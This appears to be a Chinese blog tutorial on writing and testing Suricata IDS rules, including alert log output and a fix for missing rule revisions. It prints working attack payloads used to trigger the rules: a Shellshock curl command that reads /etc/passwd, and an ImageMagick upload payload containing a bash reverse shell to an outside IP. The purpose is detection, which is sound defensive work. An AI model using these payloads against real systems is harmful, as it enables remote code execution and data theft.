【suricata】规则测试

规则测试
添加一条规则
alert icmp any any -> any any (msg:"icmp"; sid:1;)
PS:注意最后一定要有; 不然规则不生效
6/14-18:03:36.748615  [**] [1:1:0] snort general alert [**] [Classification ID: 0] [Priority ID: 3] {ICMP} 172.16.100.1 -> 172.16.100.160
INFO: Current event with event_id [13] Event Second:Microsecond [1465898616:748615] and signature id of [1] was logged with a revision of [0]
      Make sure you verify your triggering  rule body so it include the snort keyword "rev:xxx;" Where xxx is greater than 0 
>>>>>>The event has not been logged to the database<<<<<<
修改规则
alert icmp any any -> any any (msg:"icmp"; sid:1000000;rev:1;)
杀死进程,重启
就可以了,必须加上修订版本rev。
06/14-19:01:56.924150  [**] [1:1000000:1] Snort Alert [1:1000000:1] [**] [Classification ID: 0] [Priority ID: 3] {ICMP} 172.16.100.160 -> 172.16.100.1
06/14-19:01:57.927259  [**] [1:1000000:1] Snort Alert [1:1000000:1] [**] [Classification ID: 0] [Priority ID: 3] {ICMP} 172.16.100.1 -> 172.16.100.160
但是发现msg信息并没有显示出来,规则中的msg仅仅起到标示作用,告警msg需要在sid-msg.map中对应查找。我们修改一下/etc/suricata/rules/sid-msg.map,加入一条1000000 || icmp,然后重启barnyard2。

举例:
1)BASH漏洞

curl -A '() { :; }; /bin/cat /etc/passwd' http://172.16.100.160:3000/cgi-bin/poc.cgi
检测的关键字为() {
这里我们用16进制写
添加一条规则:
alert http any any -> any any (msg:"Bash RCE";flow:established,to_server; content:"|28 29 20 7b|"; http_header; classtype:BashRCE; sid:1000002; rev:1;)

2)ImageMagick漏洞
上传图片的内容为:
push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg"|bash -i >& /dev/tcp/106.187.4.9/2345 0>&1")'
pop graphic-context
然后我们新建一条规则:
alert http any any -> any any (msg:"ImageMagick RCE";flow:established,to_server; content:"url(https|3A|//"; http_client_body; classtype:vinc; sid:1000002; rev:1;)